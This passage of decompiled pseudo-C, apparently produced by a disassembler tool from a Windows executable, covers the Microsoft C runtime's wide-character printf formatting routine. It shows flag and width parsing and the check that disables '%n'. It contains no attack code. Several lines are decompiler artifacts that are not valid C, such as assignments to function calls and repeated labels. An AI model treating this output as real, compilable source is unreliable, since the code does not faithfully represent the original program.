                            															switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00423E84))) {
                            																case 0:
                            																	L18:
                            																	 *(_t525 - 0xc) = 1;
                            																	E00423F90( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
                            																	_t527 = _t527 + 0xc;
                            																	goto L214;
                            																case 1:
                            																	L19:
                            																	 *(__ebp - 0x2c) = 0;
                            																	__ecx =  *(__ebp - 0x2c);
                            																	 *(__ebp - 0x28) = __ecx;
                            																	__edx =  *(__ebp - 0x28);
                            																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																	__eax =  *(__ebp - 0x18);
                            																	 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            																	 *(__ebp - 0x10) = 0;
                            																	 *(__ebp - 0x30) = 0xffffffff;
                            																	 *(__ebp - 0xc) = 0;
                            																	goto L214;
                            																case 2:
                            																	L20:
                            																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																	 *(__ebp - 0x4e4) = __ecx;
                            																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																	__eflags =  *(__ebp - 0x4e4) - 0x10;
                            																	if( *(__ebp - 0x4e4) > 0x10) {
                            																		goto L27;
                            																	}
                            																	L21:
                            																	_t57 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            																	__ecx =  *_t57 & 0x000000ff;
                            																	switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            																		case 0:
                            																			goto L24;
                            																		case 1:
                            																			goto L25;
                            																		case 2:
                            																			goto L23;
                            																		case 3:
                            																			goto L22;
                            																		case 4:
                            																			goto L26;
                            																		case 5:
                            																			goto L27;
                            																	}
                            																case 3:
                            																	L28:
                            																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																		__edx =  *(__ebp - 0x18);
                            																		__edx =  *(__ebp - 0x18) * 0xa;
                            																		__eflags = __edx;
                            																		_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																		__ecx = __edx + _t81;
                            																		 *(__ebp - 0x18) = __ecx;
                            																	} else {
                            																		__edx = __ebp + 0x14;
                            																		 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x18);
                            																		if( *(__ebp - 0x18) < 0) {
                            																			__eax =  *(__ebp - 0x10);
                            																			__eax =  *(__ebp - 0x10) | 0x00000004;
                            																			__eflags = __eax;
                            																			 *(__ebp - 0x10) = __eax;
                            																			__ecx =  *(__ebp - 0x18);
                            																			__ecx =  ~( *(__ebp - 0x18));
                            																			 *(__ebp - 0x18) = __ecx;
                            																		}
                            																	}
                            																	L33:
                            																	goto L214;
                            																case 4:
                            																	L34:
                            																	 *(__ebp - 0x30) = 0;
                            																	goto L214;
                            																case 5:
                            																	L35:
                            																	__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																		__ecx =  *(__ebp - 0x30);
                            																		__ecx =  *(__ebp - 0x30) * 0xa;
                            																		__eflags = __ecx;
                            																		_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																		__eax = __ecx + _t92;
                            																		 *(__ebp - 0x30) = __ecx + _t92;
                            																	} else {
                            																		__eax = __ebp + 0x14;
                            																		 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) < 0) {
                            																			 *(__ebp - 0x30) = 0xffffffff;
                            																		}
                            																	}
                            																	goto L214;
                            																case 6:
                            																	L41:
                            																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																	 *(__ebp - 0x4e8) = __ecx;
                            																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																	__eflags =  *(__ebp - 0x4e8) - 0x2e;
                            																	if( *(__ebp - 0x4e8) > 0x2e) {
                            																		L64:
                            																		goto L214;
                            																	}
                            																	L42:
                            																	_t100 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            																	__ecx =  *_t100 & 0x000000ff;
                            																	switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            																		case 0:
                            																			L47:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
                            																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            																				L50:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
                            																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            																					L53:
                            																					__ecx =  *(__ebp + 0xc);
                            																					__edx =  *__ecx & 0x0000ffff;
                            																					__eflags = ( *__ecx & 0x0000ffff) - 0x64;
                            																					if(( *__ecx & 0x0000ffff) == 0x64) {
                            																						L59:
                            																						L61:
                            																						goto L64;
                            																					}
                            																					L54:
                            																					__eax =  *(__ebp + 0xc);
                            																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																					__eflags = __ecx - 0x69;
                            																					if(__ecx == 0x69) {
                            																						goto L59;
                            																					}
                            																					L55:
                            																					__edx =  *(__ebp + 0xc);
                            																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
                            																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																						goto L59;
                            																					}
                            																					L56:
                            																					__ecx =  *(__ebp + 0xc);
                            																					__edx =  *__ecx & 0x0000ffff;
                            																					__eflags = ( *__ecx & 0x0000ffff) - 0x75;
                            																					if(( *__ecx & 0x0000ffff) == 0x75) {
                            																						goto L59;
                            																					}
                            																					L57:
                            																					__eax =  *(__ebp + 0xc);
                            																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																					__eflags = __ecx - 0x78;
                            																					if(__ecx == 0x78) {
                            																						goto L59;
                            																					}
                            																					L58:
                            																					__edx =  *(__ebp + 0xc);
                            																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
                            																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																						 *(__ebp - 0x45c) = 0;
                            																						goto L18;
                            																					}
                            																					goto L59;
                            																				}
                            																				L51:
                            																				__eax =  *(__ebp + 0xc);
                            																				__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																				__eflags = __ecx - 0x32;
                            																				if(__ecx != 0x32) {
                            																					goto L53;
                            																				} else {
                            																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																					goto L61;
                            																				}
                            																			}
                            																			L48:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																			__eflags = __ecx - 0x34;
                            																			if(__ecx != 0x34) {
                            																				goto L50;
                            																			} else {
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																				goto L61;
                            																			}
                            																		case 1:
                            																			L62:
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																			 *(__ebp - 0x10) = __ecx;
                            																			goto L64;
                            																		case 2:
                            																			L43:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
                            																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            																				__eax =  *(__ebp - 0x10);
                            																				__eax =  *(__ebp - 0x10) | 0x00000010;
                            																				__eflags = __eax;
                            																				 *(__ebp - 0x10) = __eax;
                            																			} else {
                            																				__ecx =  *(__ebp + 0xc);
                            																				__ecx =  *(__ebp + 0xc) + 2;
                            																				 *(__ebp + 0xc) = __ecx;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																			}
                            																			goto L64;
                            																		case 3:
                            																			L63:
                            																			__edx =  *(__ebp - 0x10);
                            																			__edx =  *(__ebp - 0x10) | 0x00000800;
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x10) = __edx;
                            																			goto L64;
                            																		case 4:
                            																			goto L64;
                            																	}
                            																case 7:
                            																	L65:
                            																	__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																	 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            																	__ecx =  *(__ebp - 0x4ec);
                            																	__ecx =  *(__ebp - 0x4ec) - 0x41;
                            																	 *(__ebp - 0x4ec) = __ecx;
                            																	__eflags =  *(__ebp - 0x4ec) - 0x37;
                            																	if( *(__ebp - 0x4ec) > 0x37) {
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																	}
                            																	L66:
                            																	_t141 =  *(__ebp - 0x4ec) + 0x423f50; // 0xcccccc0d
                            																	__eax =  *_t141 & 0x000000ff;
                            																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423F14))) {
                            																		case 0:
                            																			L120:
                            																			 *(__ebp - 0x2c) = 1;
                            																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																			 *(__ebp - 0x454) = __ax;
                            																			goto L121;
                            																		case 1:
                            																			L67:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				__edx =  *(__ebp - 0x10);
                            																				__edx =  *(__ebp - 0x10) | 0x00000020;
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x10) = __edx;
                            																			}
                            																			goto L69;
                            																		case 2:
                            																			L82:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																				__eflags = __ecx;
                            																				 *(__ebp - 0x10) = __ecx;
                            																			}
                            																			goto L84;
                            																		case 3:
                            																			L143:
                            																			 *(__ebp - 0x460) = 7;
                            																			goto L145;
                            																		case 4:
                            																			L75:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x474) = E0041C290(__ebp + 0x14);
                            																			__eflags =  *(__ebp - 0x474);
                            																			if( *(__ebp - 0x474) == 0) {
                            																				L77:
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				L81:
                            																				goto L187;
                            																			}
                            																			L76:
                            																			__ecx =  *(__ebp - 0x474);
                            																			__eflags =  *(__ecx + 4);
                            																			if( *(__ecx + 4) != 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																					 *(__ebp - 0xc) = 0;
                            																					__edx =  *(__ebp - 0x474);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x474);
                            																					__edx =  *__ecx;
                            																					 *(__ebp - 0x24) =  *__ecx;
                            																				} else {
                            																					__edx =  *(__ebp - 0x474);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x474);
                            																					__eax =  *__ecx;
                            																					asm("cdq");
                            																					 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0xc) = 1;
                            																				}
                            																				goto L81;
                            																			}
                            																			goto L77;
                            																		case 5:
                            																			L121:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			__edx = __ebp - 0x448;
                            																			 *(__ebp - 4) = __ebp - 0x448;
                            																			 *(__ebp - 0x44) = 0x200;
                            																			__eflags =  *(__ebp - 0x30);
                            																			if( *(__ebp - 0x30) >= 0) {
                            																				L123:
                            																				__eflags =  *(__ebp - 0x30);
                            																				if( *(__ebp - 0x30) != 0) {
                            																					L126:
                            																					__eflags =  *(__ebp - 0x30) - 0x200;
                            																					if( *(__ebp - 0x30) > 0x200) {
                            																						 *(__ebp - 0x30) = 0x200;
                            																					}
                            																					L128:
                            																					__eflags =  *(__ebp - 0x30) - 0xa3;
                            																					if( *(__ebp - 0x30) > 0xa3) {
                            																						__ecx =  *(__ebp - 0x30);
                            																						__ecx =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																						__eflags =  *(__ebp - 0x20);
                            																						if( *(__ebp - 0x20) == 0) {
                            																							 *(__ebp - 0x30) = 0xa3;
                            																						} else {
                            																							__edx =  *(__ebp - 0x20);
                            																							 *(__ebp - 4) =  *(__ebp - 0x20);
                            																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																						}
                            																					}
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					__edx =  *(__ebp + 0x14);
                            																					__eax =  *(__edx - 8);
                            																					__ecx =  *(__edx - 4);
                            																					 *(__ebp - 0x490) =  *(__edx - 8);
                            																					 *(__ebp - 0x48c) =  *(__edx - 4);
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__edx =  *(__ebp - 0x2c);
                            																					_push( *(__ebp - 0x2c));
                            																					__eax =  *(__ebp - 0x30);
                            																					_push( *(__ebp - 0x30));
                            																					__ecx =  *(__ebp - 0x454);
                            																					_push( *(__ebp - 0x454));
                            																					__edx =  *(__ebp - 0x44);
                            																					_push( *(__ebp - 0x44));
                            																					__eax =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__ecx = __ebp - 0x490;
                            																					_push(__ebp - 0x490);
                            																					__edx =  *0x60b3cc; // 0x7e8c4bdb
                            																					E00410200(__edx) =  *__eax();
                            																					__esp = __esp + 0x1c;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																						__eflags =  *(__ebp - 0x30);
                            																						if( *(__ebp - 0x30) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__ecx =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																							E00410200(__edx) =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																					__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__edx =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																							__eax =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__ecx =  *(__ebp - 4);
                            																					__edx =  *( *(__ebp - 4));
                            																					__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																					if( *( *(__ebp - 4)) == 0x2d) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						__ecx =  *(__ebp - 4);
                            																						__ecx =  *(__ebp - 4) + 1;
                            																						__eflags = __ecx;
                            																						 *(__ebp - 4) = __ecx;
                            																					}
                            																					__edx =  *(__ebp - 4);
                            																					 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																					do {
                            																						L187:
                            																						__eflags =  *(__ebp - 0x28);
                            																						if( *(__ebp - 0x28) != 0) {
                            																							goto L212;
                            																						}
                            																						goto L188;
                            																					} while ( *(__ebp - 0x4ec) > 0x37);
                            																					goto L66;
                            																				}
                            																				L124:
                            																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            																					goto L126;
                            																				}
                            																				L125:
                            																				 *(__ebp - 0x30) = 1;
                            																				goto L128;
                            																			}
                            																			L122:
                            																			 *(__ebp - 0x30) = 6;
                            																			goto L128;
                            																		case 6:
                            																			L69:
                            																			 *(__ebp - 0xc) = 1;
                            																			__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x458) = __ax;
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																			__eflags = __ecx;
                            																			if(__ecx == 0) {
                            																				__cx =  *(__ebp - 0x458);
                            																				 *(__ebp - 0x448) = __cx;
                            																			} else {
                            																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
                            																				 *(__ebp - 0x470) = __dl;
                            																				 *((char*)(__ebp - 0x46f)) = 0;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D3B0(__ebp - 0x40);
                            																				__ecx = __ebp - 0x40;
                            																				E0040D3B0(__ebp - 0x40) =  *__eax;
                            																				__ecx =  *(__ebp - 0x448 + 0xac);
                            																				__edx = __ebp - 0x470;
                            																				__eax = __ebp - 0x448;
                            																				__eax = E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
                            																				__eflags = __eax;
                            																				if(__eax < 0) {
                            																					 *(__ebp - 0x28) = 1;
                            																				}
                            																			}
                            																			__edx = __ebp - 0x448;
                            																			 *(__ebp - 4) = __ebp - 0x448;
                            																			 *(__ebp - 0x24) = 1;
                            																			while(1) {
                            																				L187:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L212;
                            																				}
                            																				goto L188;
                            																			}
                            																		case 7:
                            																			L141:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 8) = 0xa;
                            																			goto L150;
                            																		case 8:
                            																			L106:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x484) = E0041C290(__ebp + 0x14);
                            																			__eax = E00420F80();
                            																			__eflags = __eax;
                            																			if(__eax != 0) {
                            																				L116:
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																				__eflags = __ecx;
                            																				if(__ecx == 0) {
                            																					__ecx =  *(__ebp - 0x484);
                            																					__edx =  *(__ebp - 0x44c);
                            																					 *__ecx =  *(__ebp - 0x44c);
                            																				} else {
                            																					__edx =  *(__ebp - 0x484);
                            																					__ax =  *(__ebp - 0x44c);
                            																					 *( *(__ebp - 0x484)) = __ax;
                            																				}
                            																				 *(__ebp - 0x28) = 1;
                            																				while(1) {
                            																					L187:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L212;
                            																					}
                            																					goto L188;
                            																				}
                            																			}
                            																			L107:
                            																			__ecx = 0;
                            																			__eflags = 0;
                            																			if(0 == 0) {
                            																				 *(__ebp - 0x4f4) = 0;
                            																			} else {
                            																				 *(__ebp - 0x4f4) = 1;
                            																			}
                            																			__edx =  *(__ebp - 0x4f4);
                            																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            																			__eflags =  *(__ebp - 0x488);
                            																			if( *(__ebp - 0x488) == 0) {
                            																				_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																				_push(0);
                            																				_push(0x695);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				__eax = L0040E1A0();
                            																				__esp = __esp + 0x14;
                            																				__eflags = __eax - 1;
                            																				if(__eax == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			__eflags =  *(__ebp - 0x488);
                            																			if( *(__ebp - 0x488) != 0) {
                            																				L115:
                            																				while(1) {
                            																					L187:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L212;
                            																					}
                            																					goto L188;
                            																				}
                            																			} else {
                            																				L114:
                            																				 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																				__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																				 *(__ebp - 0x4cc) = 0xffffffff;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D380(__ecx);
                            																				__eax =  *(__ebp - 0x4cc);
                            																				goto L225;
                            																			}
                            																		case 9:
                            																			L148:
                            																			 *(__ebp - 8) = 8;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				__edx =  *(__ebp - 0x10);
                            																				__edx =  *(__ebp - 0x10) | 0x00000200;
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x10) = __edx;
                            																			}
                            																			L150:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x49c) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x49c) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L167;
                            																			}
                            																		case 0xa:
                            																			goto L0;
                            																		case 0xb:
                            																			L84:
                            																			__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																			if( *(__ebp - 0x30) != 0xffffffff) {
                            																				__edx =  *(__ebp - 0x30);
                            																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            																			} else {
                            																				 *(__ebp - 0x4f0) = 0x7fffffff;
                            																			}
                            																			__eax =  *(__ebp - 0x4f0);
                            																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																				L98:
                            																				__eflags =  *(__ebp - 4);
                            																				if( *(__ebp - 4) == 0) {
                            																					__ecx =  *0x60b4f4; // 0x407414
                            																					 *(__ebp - 4) = __ecx;
                            																				}
                            																				 *(__ebp - 0xc) = 1;
                            																				__edx =  *(__ebp - 4);
                            																				 *(__ebp - 0x480) =  *(__ebp - 4);
                            																				while(1) {
                            																					L101:
                            																					__eax =  *(__ebp - 0x47c);
                            																					__ecx =  *(__ebp - 0x47c);
                            																					__ecx =  *(__ebp - 0x47c) - 1;
                            																					 *(__ebp - 0x47c) = __ecx;
                            																					__eflags =  *(__ebp - 0x47c);
                            																					if( *(__ebp - 0x47c) == 0) {
                            																						break;
                            																					}
                            																					L102:
                            																					__edx =  *(__ebp - 0x480);
                            																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																					__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
                            																						break;
                            																					}
                            																					L103:
                            																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																				}
                            																				L104:
                            																				__edx =  *(__ebp - 0x480);
                            																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x24) = __edx;
                            																				goto L105;
                            																			} else {
                            																				L88:
                            																				__eflags =  *(__ebp - 4);
                            																				if( *(__ebp - 4) == 0) {
                            																					__eax =  *0x60b4f0; // 0x407424
                            																					 *(__ebp - 4) = __eax;
                            																				}
                            																				__ecx =  *(__ebp - 4);
                            																				 *(__ebp - 0x478) = __ecx;
                            																				 *(__ebp - 0x24) = 0;
                            																				while(1) {
                            																					L92:
                            																					__eax =  *(__ebp - 0x24);
                            																					__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
                            																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
                            																						break;
                            																					}
                            																					L93:
                            																					__ecx =  *(__ebp - 0x478);
                            																					__edx =  *__ecx;
                            																					__eflags =  *__ecx;
                            																					if( *__ecx == 0) {
                            																						break;
                            																					}
                            																					L94:
                            																					__ecx = __ebp - 0x40;
                            																					E0040D3B0(__ebp - 0x40) =  *(__ebp - 0x478);
                            																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
